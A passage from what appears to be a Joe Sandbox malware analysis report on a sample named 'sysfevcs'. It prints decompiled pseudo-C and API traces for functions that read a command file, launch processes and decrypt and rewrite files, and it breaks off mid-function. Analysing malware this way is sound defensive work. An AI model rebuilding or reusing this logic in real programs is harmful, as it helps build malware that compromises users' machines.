                                                                                                                                                                                                                                                                  control_flow_graph 307 404320-404352 InitializeCriticalSection CreateFileW 308 404445-404448 307->308 309 404358-404373 CreateFileMappingW 307->309 310 404379-404392 MapViewOfFile 309->310 311 40443b-40443f CloseHandle 309->311 312 404431-404435 CloseHandle 310->312 313 404398-4043aa GetFileSize 310->313 311->308 312->311 314 4043ad-4043b1 313->314 315 4043b3-4043ba 314->315 316 404427-40442b UnmapViewOfFile 314->316 317 4043bc 315->317 318 4043be-4043d1 call 40af30 315->318 316->312 317->316 321 4043d3 318->321 322 4043d5-4043ea 318->322 321->316 323 4043fa-404425 call 404210 322->323 324 4043ec-4043f8 call 408990 322->324 323->314 324->316
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404320() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				void* _t35;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				void* _t66;
                                                                                                                                                                                                                                                                  				void* _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t35 = CreateFileW("C:\Users\hardz\tbcmds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v12 == 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 == 0) {
                                                                                                                                                                                                                                                                  						L13:
                                                                                                                                                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  					_v24 = _v16;
                                                                                                                                                                                                                                                                  					while(_v20 != 0) {
                                                                                                                                                                                                                                                                  						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                  							_t45 = E0040AF30(_v24, _v24);
                                                                                                                                                                                                                                                                  							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                  							_v28 = _t45;
                                                                                                                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                                                                                                                  								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                  									E00404210(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                  									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								E00408990(_v28);
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                  					goto L13;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t35;
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040432b
                                                                                                                                                                                                                                                                  0x00404345
                                                                                                                                                                                                                                                                  0x0040434b
                                                                                                                                                                                                                                                                  0x00404352
                                                                                                                                                                                                                                                                  0x0040436c
                                                                                                                                                                                                                                                                  0x00404373
                                                                                                                                                                                                                                                                  0x0040443b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040443f
                                                                                                                                                                                                                                                                  0x0040438b
                                                                                                                                                                                                                                                                  0x00404392
                                                                                                                                                                                                                                                                  0x00404431
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x004043a4
                                                                                                                                                                                                                                                                  0x004043aa
                                                                                                                                                                                                                                                                  0x004043ad
                                                                                                                                                                                                                                                                  0x004043ba
                                                                                                                                                                                                                                                                  0x004043c2
                                                                                                                                                                                                                                                                  0x004043c7
                                                                                                                                                                                                                                                                  0x004043ca
                                                                                                                                                                                                                                                                  0x004043d1
                                                                                                                                                                                                                                                                  0x004043de
                                                                                                                                                                                                                                                                  0x004043ea
                                                                                                                                                                                                                                                                  0x00404411
                                                                                                                                                                                                                                                                  0x00404416
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x004043f0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043f5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043d3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043bc
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00404448

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00412F50,?,?,?,?,?,00406247), ref: 0040432B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tbcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00406247), ref: 00404345
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404366
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404385
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040439E
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040442B
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404435
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040443F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Users\user\tbcmds.dat, xrefs: 00404340
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\tbcmds.dat
                                                                                                                                                                                                                                                                  • API String ID: 3956458805-2662529796
                                                                                                                                                                                                                                                                  • Opcode ID: d8440059df3eb83aab7fa725ae45743e5d074d460aba15d0b4fb4309b0bd48f9
                                                                                                                                                                                                                                                                  • Instruction ID: 8cf7ad255a7857f357f70f31b3d1861fd7fd2a42964d5e35bc13e120cdf15e34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8440059df3eb83aab7fa725ae45743e5d074d460aba15d0b4fb4309b0bd48f9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C83130B4E40209EFDB10DFE4DD4ABAEB770AB88711F208579E6017B6C0D7B46941CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 329 40d0b0-40d10e memset CreateProcessW 330 40d110-40d11d Sleep 329->330 331 40d11f-40d143 ShellExecuteW 329->331 332 40d156-40d159 330->332 333 40d154 331->333 334 40d145-40d152 Sleep 331->334 333->332 334->332
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D0B0(char _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                  				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                                                                                                                  				int _t20;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                  				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                  				_v24.hThread = 0;
                                                                                                                                                                                                                                                                  				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                  				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                  				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                  				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                  				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                  				_t11 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                                                                                                                                                                                                  				if(_t20 != 1) {
                                                                                                                                                                                                                                                                  					_t12 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                  					_v104 = _v8;
                                                                                                                                                                                                                                                                  					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040d0be
                                                                                                                                                                                                                                                                  0x0040d0c8
                                                                                                                                                                                                                                                                  0x0040d0cb
                                                                                                                                                                                                                                                                  0x0040d0ce
                                                                                                                                                                                                                                                                  0x0040d0d1
                                                                                                                                                                                                                                                                  0x0040d0d4
                                                                                                                                                                                                                                                                  0x0040d0db
                                                                                                                                                                                                                                                                  0x0040d0e7
                                                                                                                                                                                                                                                                  0x0040d0ff
                                                                                                                                                                                                                                                                  0x0040d105
                                                                                                                                                                                                                                                                  0x0040d10e
                                                                                                                                                                                                                                                                  0x0040d125
                                                                                                                                                                                                                                                                  0x0040d136
                                                                                                                                                                                                                                                                  0x0040d13c
                                                                                                                                                                                                                                                                  0x0040d143
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d154
                                                                                                                                                                                                                                                                  0x0040d14a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d150
                                                                                                                                                                                                                                                                  0x0040d115
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE ref: 0040D105
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,K_@,00000000,00000000,00000000), ref: 0040D130
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D14A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                  • String ID: $D$K_@$open
                                                                                                                                                                                                                                                                  • API String ID: 2222793131-44698946
                                                                                                                                                                                                                                                                  • Opcode ID: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction ID: 5b9e7ff7f959b24c41b671f48102102a5a22ad29d8e5895e5d8be873d8d12d20
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D111FE71E44308EBEB14DF94DD46B9E7774AB44B00F20413AF609BA2C1D6B55A04CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 335 40cef0-40cf31 CreateFileW 336 40d043-40d047 335->336 337 40cf37-40cf52 CreateFileMappingW 335->337 340 40d049-40d069 CreateFileW 336->340 341 40d09d-40d0a5 336->341 338 40cf58-40cf71 MapViewOfFile 337->338 339 40d039-40d03d CloseHandle 337->339 342 40cf77-40cf8d GetFileSize 338->342 343 40d02f-40d033 CloseHandle 338->343 339->336 344 40d091-40d09a call 408990 340->344 345 40d06b-40d08b WriteFile CloseHandle 340->345 346 40cf93-40cfa6 call 40af00 342->346 347 40d025-40d029 UnmapViewOfFile 342->347 343->339 344->341 345->344 346->347 352 40cfa8-40cfb7 346->352 347->343 352->347 353 40cfb9-40cfd9 call 40a8a0 352->353 355 40cfde-40cfe8 353->355 355->347 356 40cfea-40d010 call 4091e0 355->356 356->347 359 40d012-40d01e call 408990 356->359 359->347
                                                                                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                                                                                  			E0040CEF0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				DWORD* _v20;
                                                                                                                                                                                                                                                                  				char _v21;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				void* _t62;
                                                                                                                                                                                                                                                                  				void* _t64;
                                                                                                                                                                                                                                                                  				DWORD* _t70;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v21 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t54 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v16 = _t54;
                                                                                                                                                                                                                                                                  				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_t56 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                  						_v16 = _t56;
                                                                                                                                                                                                                                                                  						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							_v21 = 1;
                                                                                                                                                                                                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0); // executed
                                                                                                                                                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return _v21;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t62 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v28 = _t62;
                                                                                                                                                                                                                                                                  				if(_v28 == 0) {
                                                                                                                                                                                                                                                                  					L11:
                                                                                                                                                                                                                                                                  					CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					goto L12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t64 = MapViewOfFile(_v28, 4, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v32 = _t64;
                                                                                                                                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                                                                                                                                  					L10:
                                                                                                                                                                                                                                                                  					CloseHandle(_v28);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                  					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                  						_t70 = E0040AF00(_v32, _v32);
                                                                                                                                                                                                                                                                  						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  						_v20 = _t70;
                                                                                                                                                                                                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                  							_v12 = _v20[6];
                                                                                                                                                                                                                                                                  							_t73 = E0040A8A0(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12); // executed
                                                                                                                                                                                                                                                                  							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                  							_v8 = _t73;
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								E004091E0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                  								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                  								asm("repe cmpsd");
                                                                                                                                                                                                                                                                  								if(0 != 0) {
                                                                                                                                                                                                                                                                  									E00408990(_v8);
                                                                                                                                                                                                                                                                  									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  									_v8 = 0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v32);
                                                                                                                                                                                                                                                                  					goto L10;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}


















                                                                                                                                                                                                                                                                  0x0040cef8
                                                                                                                                                                                                                                                                  0x0040cefc
                                                                                                                                                                                                                                                                  0x0040cf03
                                                                                                                                                                                                                                                                  0x0040cf0a
                                                                                                                                                                                                                                                                  0x0040cf24
                                                                                                                                                                                                                                                                  0x0040cf2a
                                                                                                                                                                                                                                                                  0x0040cf31
                                                                                                                                                                                                                                                                  0x0040d043
                                                                                                                                                                                                                                                                  0x0040d047
                                                                                                                                                                                                                                                                  0x0040d05c
                                                                                                                                                                                                                                                                  0x0040d062
                                                                                                                                                                                                                                                                  0x0040d069
                                                                                                                                                                                                                                                                  0x0040d06b
                                                                                                                                                                                                                                                                  0x0040d081
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d095
                                                                                                                                                                                                                                                                  0x0040d09a
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040cf45
                                                                                                                                                                                                                                                                  0x0040cf4b
                                                                                                                                                                                                                                                                  0x0040cf52
                                                                                                                                                                                                                                                                  0x0040d039
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x0040cf64
                                                                                                                                                                                                                                                                  0x0040cf6a
                                                                                                                                                                                                                                                                  0x0040cf71
                                                                                                                                                                                                                                                                  0x0040d02f
                                                                                                                                                                                                                                                                  0x0040d033
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cf77
                                                                                                                                                                                                                                                                  0x0040cf83
                                                                                                                                                                                                                                                                  0x0040cf8d
                                                                                                                                                                                                                                                                  0x0040cf97
                                                                                                                                                                                                                                                                  0x0040cf9c
                                                                                                                                                                                                                                                                  0x0040cf9f
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040cfbf
                                                                                                                                                                                                                                                                  0x0040cfd9
                                                                                                                                                                                                                                                                  0x0040cfde
                                                                                                                                                                                                                                                                  0x0040cfe1
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cff6
                                                                                                                                                                                                                                                                  0x0040cffb
                                                                                                                                                                                                                                                                  0x0040d00e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040d016
                                                                                                                                                                                                                                                                  0x0040d01b
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040d029
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d029

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D029
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D033
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D03D
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D05C
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040D081
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D08B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 171974401-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e251ebf514edbbc699785198ef109304658127cdaaed0d253fef978fa45eba1
                                                                                                                                                                                                                                                                  • Instruction ID: 0e99ab12e2f06471f33da5b613d817b3e723ed7e49a2bb816a75a8e19955daac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e251ebf514edbbc699785198ef109304658127cdaaed0d253fef978fa45eba1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215170B5E00208EBDB10DFE4DC49BAFB774AB48304F108569E614BB2C0D7786A45CB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 362 4046a0-4046cc EnterCriticalSection call 40af90 365 4046d2-4046e5 call 40af30 362->365 366 4048de-4048f1 LeaveCriticalSection 362->366 365->366 369 4046eb-4046fa 365->369 370 404705-40470e 369->370 371 404801-404807 370->371 372 404714-404732 370->372 373 404834-404846 call 408990 371->373 374 404809-404817 call 404210 371->374 375 404734 372->375 376 404736-4047fa call 408990 call 408a00 call 408990 call 40a8a0 call 4059c0 372->376 373->366 384 40484c-40486d CreateFileW 373->384 383 40481c-404824 374->383 375->370 376->371 383->373 386 404826-404830 383->386 384->366 387 40486f-404876 384->387 386->373 389 404881-40488a 387->389 392 4048ca-4048d8 FlushFileBuffers CloseHandle 389->392 393 40488c-4048c8 WriteFile 389->393 392->366 395 404878-40487e 393->395 395->389
                                                                                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                                                                                  			E004046A0(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				signed int _v5;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				signed int _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				long _v36;
                                                                                                                                                                                                                                                                  				signed char _t76;
                                                                                                                                                                                                                                                                  				void* _t79;
                                                                                                                                                                                                                                                                  				void* _t82;
                                                                                                                                                                                                                                                                  				intOrPtr _t87;
                                                                                                                                                                                                                                                                  				intOrPtr _t88;
                                                                                                                                                                                                                                                                  				signed char _t91;
                                                                                                                                                                                                                                                                  				signed int _t141;
                                                                                                                                                                                                                                                                  				void* _t158;
                                                                                                                                                                                                                                                                  				void* _t159;
                                                                                                                                                                                                                                                                  				void* _t160;
                                                                                                                                                                                                                                                                  				void* _t169;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v5 = 0;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t111 = _a12;
                                                                                                                                                                                                                                                                  				_t76 = E0040AF90(_a12, _a16); // executed
                                                                                                                                                                                                                                                                  				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  					_t79 = E0040AF30(_t111, _a12); // executed
                                                                                                                                                                                                                                                                  					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                  					_v12 = _t79;
                                                                                                                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                                                                                                                  						_v5 = 1;
                                                                                                                                                                                                                                                                  						_v13 = 0;
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t169 = _v20 -  *0x412f6c; // 0x1
                                                                                                                                                                                                                                                                  							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v24 = _v20 * 0x110 +  *0x412f68;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x108)));
